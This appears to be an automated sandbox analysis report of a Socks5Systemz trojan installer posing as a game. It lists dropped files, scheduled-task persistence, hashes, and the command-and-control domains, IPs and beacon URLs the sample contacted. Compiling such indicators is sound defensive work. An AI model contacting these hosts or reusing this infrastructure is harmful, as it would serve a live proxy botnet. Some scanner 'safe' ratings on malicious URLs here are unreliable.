                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1575229 Sample: KRdh0OaXqH.exe Startdate: 14/12/2024 Architecture: WINDOWS Score: 100 49 Suricata IDS alerts for network traffic 2->49 51 Found malware configuration 2->51 53 Antivirus / Scanner detection for submitted sample 2->53 55 9 other signatures 2->55 8 KRdh0OaXqH.exe 2 2->8         started        process3 file4 33 C:\Users\user\AppData\...\KRdh0OaXqH.tmp, PE32 8->33 dropped 11 KRdh0OaXqH.tmp 17 76 8->11         started        process5 file6 35 C:\Program Files (x86)\CRTGame\crtgame.exe, PE32 11->35 dropped 37 C:\Program Files (x86)\...\is-HBA5G.tmp, PE32 11->37 dropped 39 C:\Program Files (x86)\...\is-82P0C.tmp, PE32 11->39 dropped 41 106 other files (none is malicious) 11->41 dropped 57 Uses schtasks.exe or at.exe to add and modify task schedules 11->57 15 crtgame.exe 1 15 11->15         started        18 net.exe 1 11->18         started        20 crtgame.exe 1 2 11->20         started        23 schtasks.exe 1 11->23         started        signatures7 process8 dnsIp9 43 goeiwef.com 185.237.206.129, 49904, 49920, 49923 ITLDC-NLUA Ukraine 15->43 45 ayptoht.ru 94.232.249.187, 49788, 49818, 49848 INT-PDN-STE-ASSTEPDNInternalASSY Syrian Arab Republic 15->45 47 46.8.225.74, 2023, 49909, 49922 FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics Russian Federation 15->47 25 conhost.exe 18->25         started        27 net1.exe 1 18->27         started        31 C:\ProgramData\SpaceXRaces\SpaceXRaces.exe, PE32 20->31 dropped 29 conhost.exe 23->29         started        file10 process11

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  KRdh0OaXqH.exe55%ReversingLabsWin32.Trojan.Sockssystemz
                  KRdh0OaXqH.exe100%AviraHEUR/AGEN.1332570
                  SourceDetectionScannerLabelLink
                  C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy)3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy)3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy)3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy)3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy)3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bassmidi.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bassmix.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bassopus.dll (copy)3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\basswma.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\basswv.dll (copy)3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\d_writer.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\da.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\daiso.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\dsd2.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\dsd2pcmt.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\dstt.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\ff_helper.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\gain_analysis.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-0NR14.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-1V1KO.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-2BNI8.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-2JFSM.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-2Q15C.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-3L2G6.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-3PB3G.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-41E97.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-5CFA9.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-72UK0.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-82P0C.tmp3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-8CIMQ.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-8REH5.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-9AV62.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-9OEDN.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-9QS5M.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-AE6QK.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-BLG4U.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-BUF5F.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-C09DN.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-CJ9O9.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-DC7IR.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-FL34R.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-H36N8.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-H4RQI.tmp3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-HBA5G.tmp3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-I2830.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-JN15J.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-M699B.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-MB554.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-MDCMM.tmp3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-MSL58.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-O5AH5.tmp3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-PKSJK.tmp0%ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://mp4v2.googlecode.com/svn/trunk0%Avira URL Cloudsafe
                  http://185.237.206.129/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde0%Avira URL Cloudsafe
                  https://mp4v2.googlecode.com/svnrepository0%Avira URL Cloudsafe
                  http://goeiwef.com/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb220%Avira URL Cloudsafe
                  http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde20%Avira URL Cloudsafe
                  http://www.mp3dev.org/ID3Error0%Avira URL Cloudsafe
                  http://185.237.206.129/0%Avira URL Cloudsafe
                  http://goeiwef.com/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568ddb05fb19ca0%Avira URL Cloudsafe
                  goeiwef.com0%Avira URL Cloudsafe
                  http://185.237.206.129/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde0%Avira URL Cloudsafe
                  http://www.mpg123.de0%Avira URL Cloudsafe
                  http://ocsps.ssl.com0Q0%Avira URL Cloudsafe
                  http://lame.sf.net32bits0%Avira URL Cloudsafe
                  https://mp4v2.googlecode.com/svn/trunkrepository0%Avira URL Cloudsafe
                  http://mingw-w64.sourceforge.net/X0%Avira URL Cloudsafe
                  http://lame.sf.net0%Avira URL Cloudsafe
                  http://94.232.249.187/0%Avira URL Cloudsafe
                  http://LosslessAudio.org/00%Avira URL Cloudsafe
                  http://ayptoht.ru/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568ddb05fb19ca0%Avira URL Cloudsafe
                  https://mp4v2.googlecode.com/svn0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  goeiwef.com
                  185.237.206.129
                  truetrue
                    unknown
                    ayptoht.ru
                    94.232.249.187
                    truetrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      goeiwef.comtrue
                      • Avira URL Cloud: safe
                      unknown
                      http://goeiwef.com/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22true
                      • Avira URL Cloud: safe
                      unknown
                      http://goeiwef.com/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568ddb05fb19catrue
                      • Avira URL Cloud: safe
                      unknown
                      http://ayptoht.ru/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568ddb05fb19catrue
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.innosetup.com/KRdh0OaXqH.tmp, KRdh0OaXqH.tmp, 00000001.00000000.2045600453.0000000000401000.00000020.00000001.01000000.00000004.sdmp, KRdh0OaXqH.tmp.0.dr, is-4K1KF.tmp.1.drfalse
                        high
                        https://gcc.gnu.org/bugs/):is-RDHKR.tmp.1.drfalse
                          high
                          http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0is-9QS5M.tmp.1.dr, is-UT63K.tmp.1.drfalse
                            high
                            https://mp4v2.googlecode.com/svn/trunkis-AE6QK.tmp.1.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://sectigo.com/CPS0is-RUH59.tmp.1.dr, is-TF38E.tmp.1.drfalse
                              high
                              http://ocsp.sectigo.com0is-RUH59.tmp.1.dr, is-TF38E.tmp.1.drfalse
                                high
                                http://www.mp3dev.org/ID3Erroris-BUF5F.tmp.1.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://185.237.206.129/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cdecrtgame.exe, 00000007.00000002.3291501599.0000000000988000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3291501599.00000000009B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://185.237.206.129/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62ddecrtgame.exe, 00000007.00000002.3291501599.00000000009A7000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3291501599.0000000000927000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://mp4v2.googlecode.com/svnrepositoryis-AE6QK.tmp.1.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://ocsps.ssl.com0is-9QS5M.tmp.1.dr, is-UT63K.tmp.1.drfalse
                                  high
                                  http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sis-RUH59.tmp.1.dr, is-TF38E.tmp.1.drfalse
                                    high
                                    http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde2crtgame.exe, 00000007.00000002.3291501599.000000000099D000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#is-RUH59.tmp.1.dr, is-TF38E.tmp.1.drfalse
                                      high
                                      http://185.237.206.129/crtgame.exe, 00000007.00000002.3291501599.0000000000988000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.mpg123.deis-H36N8.tmp.1.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://mp4v2.googlecode.com/svn/trunkrepositoryis-AE6QK.tmp.1.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://crls.ssl.com/ssl.com-rsa-RootCA.crl0is-9QS5M.tmp.1.dr, is-UT63K.tmp.1.drfalse
                                        high
                                        http://www.remobjects.com/psUKRdh0OaXqH.exe, 00000000.00000003.2045167392.0000000002128000.00000004.00001000.00020000.00000000.sdmp, KRdh0OaXqH.exe, 00000000.00000003.2044999895.0000000002390000.00000004.00001000.00020000.00000000.sdmp, KRdh0OaXqH.tmp, 00000001.00000000.2045600453.0000000000401000.00000020.00000001.01000000.00000004.sdmp, KRdh0OaXqH.tmp.0.dr, is-4K1KF.tmp.1.drfalse
                                          high
                                          http://lame.sf.netis-BUF5F.tmp.1.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://streams.videolan.org/upload/is-UJQGJ.tmp.1.drfalse
                                            high
                                            http://mingw-w64.sourceforge.net/Xis-2BNI8.tmp.1.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.ssl.com/repository0is-9QS5M.tmp.1.dr, is-UT63K.tmp.1.drfalse
                                              high
                                              http://LosslessAudio.org/0is-QOSQ7.tmp.1.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://lame.sf.net32bitsis-BUF5F.tmp.1.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.mp3dev.org/is-BUF5F.tmp.1.drfalse
                                                high
                                                http://code.google.com/p/mp4v2Dis-AE6QK.tmp.1.drfalse
                                                  high
                                                  http://94.232.249.187/crtgame.exe, 00000007.00000002.3291501599.0000000000988000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.remobjects.com/psKRdh0OaXqH.exe, 00000000.00000003.2045167392.0000000002128000.00000004.00001000.00020000.00000000.sdmp, KRdh0OaXqH.exe, 00000000.00000003.2044999895.0000000002390000.00000004.00001000.00020000.00000000.sdmp, KRdh0OaXqH.tmp, KRdh0OaXqH.tmp, 00000001.00000000.2045600453.0000000000401000.00000020.00000001.01000000.00000004.sdmp, KRdh0OaXqH.tmp.0.dr, is-4K1KF.tmp.1.drfalse
                                                    high
                                                    https://mp4v2.googlecode.com/svnis-AE6QK.tmp.1.drfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0is-9QS5M.tmp.1.dr, is-UT63K.tmp.1.drfalse
                                                      high
                                                      http://ocsps.ssl.com0Qis-9QS5M.tmp.1.dr, is-UT63K.tmp.1.drfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.sqlite.org/copyright.html.is-9OEDN.tmp.1.drfalse
                                                        high
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        46.8.225.74
                                                        unknownRussian Federation
                                                        28917FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsfalse
                                                        94.232.249.187
                                                        ayptoht.ruSyrian Arab Republic
                                                        29256INT-PDN-STE-ASSTEPDNInternalASSYtrue
                                                        185.237.206.129
                                                        goeiwef.comUkraine
                                                        21100ITLDC-NLUAtrue
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1575229
                                                        Start date and time:2024-12-14 20:06:09 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 7m 1s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:12
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:KRdh0OaXqH.exe
                                                        renamed because original name is a hash value
                                                        Original Sample Name:61ab9f06b48b8df40ce15ce9252c0531.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.evad.winEXE@15/128@7/3
                                                        EGA Information:
                                                        • Successful, ratio: 100%
                                                        HCA Information:
                                                        • Successful, ratio: 95%
                                                        • Number of executed functions: 177
                                                        • Number of non-executed functions: 243
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                        • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • VT rate limit hit for: KRdh0OaXqH.exe
                                                        TimeTypeDescription
                                                        14:07:38API Interceptor343125x Sleep call for process: crtgame.exe modified
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        46.8.225.74AGcC2uK0El.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                          6hvZpn91O8.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                            j9htknb7BQ.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                              94.232.249.187wG1fFAzGfH.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                AGcC2uK0El.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                  6hvZpn91O8.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                    j9htknb7BQ.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                      185.237.206.129Invoice.xlsxGet hashmaliciousFormBookBrowse
                                                                      • 185.237.206.129/jinn.exe
                                                                      No context
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsAGcC2uK0El.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                      • 46.8.225.74
                                                                      6hvZpn91O8.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                      • 46.8.225.74
                                                                      j9htknb7BQ.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                      • 46.8.225.74
                                                                      b3astmode.arm5.elfGet hashmaliciousMiraiBrowse
                                                                      • 109.248.108.147
                                                                      reduce.exeGet hashmaliciousGO BackdoorBrowse
                                                                      • 46.8.236.61
                                                                      InsertSr.exeGet hashmaliciousGO BackdoorBrowse
                                                                      • 46.8.236.61
                                                                      iKhdG3bwZK.exeGet hashmaliciousGO BackdoorBrowse
                                                                      • 46.8.236.61
                                                                      ppc.elfGet hashmaliciousMiraiBrowse
                                                                      • 46.8.228.104
                                                                      file.exeGet hashmaliciousCryptbotBrowse
                                                                      • 46.8.237.112
                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                      • 46.8.237.112
                                                                      ITLDC-NLUAwG1fFAzGfH.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                      • 185.237.206.129
                                                                      AGcC2uK0El.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                      • 185.237.206.129
                                                                      file.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 185.174.173.22
                                                                      secure.htmGet hashmaliciousHTMLPhisherBrowse
                                                                      • 217.12.218.219
                                                                      EIqeWlQMGR.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 185.174.175.187
                                                                      9WqvcxYptm.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 185.174.173.22
                                                                      sd2.ps1Get hashmaliciousUnknownBrowse
                                                                      • 195.123.217.43
                                                                      Pago_7839389309_8w20w808_723869189.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 185.174.175.187
                                                                      RRT78-89079090GFVU0-INVRYU-FVIOJ0I.exeGet hashmaliciousMassLogger RATBrowse
                                                                      • 185.174.173.22
                                                                      FATURA.exeGet hashmaliciousFormBookBrowse
                                                                      • 185.174.173.22
                                                                      INT-PDN-STE-ASSTEPDNInternalASSYwG1fFAzGfH.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                      • 94.232.249.187
                                                                      AGcC2uK0El.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                      • 94.232.249.187
                                                                      6hvZpn91O8.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                      • 94.232.249.187
                                                                      j9htknb7BQ.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                      • 94.232.249.187
                                                                      jade.arm.elfGet hashmaliciousMiraiBrowse
                                                                      • 31.9.99.97
                                                                      jade.ppc.elfGet hashmaliciousMiraiBrowse
                                                                      • 95.212.143.36
                                                                      jade.x86.elfGet hashmaliciousMiraiBrowse
                                                                      • 31.14.164.17
                                                                      Josho.ppc.elfGet hashmaliciousUnknownBrowse
                                                                      • 95.212.143.56
                                                                      la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                                      • 178.171.212.67
                                                                      home.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                      • 188.247.2.172
                                                                      No context
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)wG1fFAzGfH.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                        AGcC2uK0El.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                          6hvZpn91O8.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                            j9htknb7BQ.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                              SecuriteInfo.com.Win32.Malware-gen.2354.25353.exeGet hashmaliciousUnknownBrowse
                                                                                SecuriteInfo.com.Win32.Malware-gen.2354.25353.exeGet hashmaliciousUnknownBrowse
                                                                                  SecuriteInfo.com.Win32.Malware-gen.27540.30253.exeGet hashmaliciousUnknownBrowse
                                                                                    SecuriteInfo.com.Win32.Malware-gen.27540.30253.exeGet hashmaliciousUnknownBrowse
                                                                                      SecuriteInfo.com.Win32.Malware-gen.371.3693.exeGet hashmaliciousUnknownBrowse
                                                                                        SecuriteInfo.com.Win32.Malware-gen.371.3693.exeGet hashmaliciousUnknownBrowse
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):337408
                                                                                          Entropy (8bit):6.515131904432587
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:3nzsyDn7PDS+FDflUjvJUkbEOyF1rOpsuCOuOff5k4F/lTRHA:3377SKfgvqkbFyFJCRRzH
                                                                                          MD5:62D2156E3CA8387964F7AA13DD1CCD5B
                                                                                          SHA1:A5067E046ED9EA5512C94D1D17C394D6CF89CCCA
                                                                                          SHA-256:59CBFBA941D3AC0238219DAA11C93969489B40F1E8B38FABDB5805AC3DD72BFA
                                                                                          SHA-512:006F7C46021F339B6CBF9F0B80CFFA74ABB8D48E12986266D069738C4E6BDB799BFBA4B8EE4565A01E90DBE679A96A2399D795A6EAD6EACBB4818A155858BF60
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Joe Sandbox View:
                                                                                          • Filename: wG1fFAzGfH.exe, Detection: malicious, Browse
                                                                                          • Filename: AGcC2uK0El.exe, Detection: malicious, Browse
                                                                                          • Filename: 6hvZpn91O8.exe, Detection: malicious, Browse
                                                                                          • Filename: j9htknb7BQ.exe, Detection: malicious, Browse
                                                                                          • Filename: SecuriteInfo.com.Win32.Malware-gen.2354.25353.exe, Detection: malicious, Browse
                                                                                          • Filename: SecuriteInfo.com.Win32.Malware-gen.2354.25353.exe, Detection: malicious, Browse
                                                                                          • Filename: SecuriteInfo.com.Win32.Malware-gen.27540.30253.exe, Detection: malicious, Browse
                                                                                          • Filename: SecuriteInfo.com.Win32.Malware-gen.27540.30253.exe, Detection: malicious, Browse
                                                                                          • Filename: SecuriteInfo.com.Win32.Malware-gen.371.3693.exe, Detection: malicious, Browse
                                                                                          • Filename: SecuriteInfo.com.Win32.Malware-gen.371.3693.exe, Detection: malicious, Browse
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@..|...|...|...p...|...w...|.d.r...|...v...|...x...|.i.#...|...}.|.|.d.!...|...w...|..V....|...v...|.......|. .z...|.Rich..|.........PE..L....r.b.....................>......\........ ....@.......................................@.....................................x....0.......................@...3................................................... ..(............................text............................... ..`.rdata..r.... ......................@..@.data....'..........................@....sxdata...... ......................@....rsrc........0......................@..@.reloc...<...@...>..................@..B........................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:ASCII text
                                                                                          Category:dropped
                                                                                          Size (bytes):26526
                                                                                          Entropy (8bit):4.600837395607617
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:Lc56OuAbnn0UReX6wFDVxnFw7xqsvzt+z/k8E9HinIhFkspcM9bc7ups0CZuQG:Lc5trLeDnFMz1ReScmc7GshZuQG
                                                                                          MD5:BD7A443320AF8C812E4C18D1B79DF004
                                                                                          SHA1:37D2F1D62FEC4DA0CAF06E5DA21AFC3521B597AA
                                                                                          SHA-256:B634AB5640E258563C536E658CAD87080553DF6F34F62269A21D554844E58BFE
                                                                                          SHA-512:21AEF7129B5B70E3F9255B1EA4DC994BF48B8A7F42CD90748D71465738D934891BBEC6C6FC6A1CCFAF7D3F35496677D62E2AF346D5E8266F6A51AE21A65C4460
                                                                                          Malicious:false
                                                                                          Preview: GNU LESSER GENERAL PUBLIC LICENSE. Version 2.1, February 1999.. Copyright (C) 1991, 1999 Free Software Foundation, Inc.. 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed...[This is the first released version of the Lesser GPL. It also counts. as the successor of the GNU Library Public License, version 2, hence. the version number 2.1.].. Preamble.. The licenses for most software are designed to take away your.freedom to share and change it. By contrast, the GNU General Public.Licenses are intended to guarantee your freedom to share and change.free software--to make sure the software is free for all its users... This license, the Lesser General Public License, applies to some.specially designated software packages--typically libraries--of the.Free Software Foundation and other authors who
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):214016
                                                                                          Entropy (8bit):6.676457645865373
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:v3UEEkp2yVTcc295GSSazZq0/OlxAOxN5jZ2Ti30ezAg0Fu9RBhk1Xion:cEEpYcc2G/adqLtxLZ2+vAO9Hhkzn
                                                                                          MD5:2C747F19BF1295EBBDAB9FB14BB19EE2
                                                                                          SHA1:6F3B71826C51C739D6BB75085E634B2B2EF538BC
                                                                                          SHA-256:D2074B91A63219CFD3313C850B2833CD579CC869EF751B1F5AD7EDFB77BD1EDD
                                                                                          SHA-512:C100C0A5AF52D951F3905884E9B9D0EC1A0D0AEBE70550A646BA6E5D33583247F67CA19E1D045170A286D92EE84E1676A6C1B0527E017A35B6242DD9DEE05AF4
                                                                                          Malicious:false
                                                                                          Antivirus:
